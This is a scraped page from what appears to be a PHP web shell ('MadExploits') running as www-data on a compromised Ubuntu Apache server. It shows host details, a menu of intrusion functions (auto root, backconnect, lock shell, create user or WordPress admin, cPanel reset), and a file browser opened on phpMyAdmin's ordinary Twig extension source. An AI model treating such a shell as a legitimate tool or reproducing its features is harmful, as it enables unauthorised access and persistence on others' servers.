Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 216.73.216.89
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
restaurants /
var /
phpmyadmin /
src /
Twig /
[ HOME SHELL ]
Name
Size
Permission
Action
AssetExtension.php
953
B
-rw-r--r--
CoreExtension.php
488
B
-rw-r--r--
FlashMessagesExtension.php
389
B
-rw-r--r--
I18nExtension.php
680
B
-rw-r--r--
MessageExtension.php
1010
B
-rw-r--r--
SanitizeExtension.php
935
B
-rw-r--r--
TransformationsExtension.php
722
B
-rw-r--r--
UrlExtension.php
1.16
KB
-rw-r--r--
UtilExtension.php
4.57
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : AssetExtension.php
<?php declare(strict_types=1); namespace PhpMyAdmin\Twig; use PhpMyAdmin\Container\ContainerBuilder; use PhpMyAdmin\Theme\ThemeManager; use Twig\Extension\AbstractExtension; use Twig\TwigFunction; final class AssetExtension extends AbstractExtension { private ThemeManager|null $themeManager = null; /** @return TwigFunction[] */ public function getFunctions(): array { return [new TwigFunction('image', $this->getImagePath(...))]; } public function getImagePath(string|null $filename = null, string|null $fallback = null): string { if ($this->themeManager === null) { $themeManager = ContainerBuilder::getContainer()->get(ThemeManager::class); if (! $themeManager instanceof ThemeManager) { return ''; } $this->themeManager = $themeManager; } return $this->themeManager->theme->getImgPath($filename, $fallback); } }
Close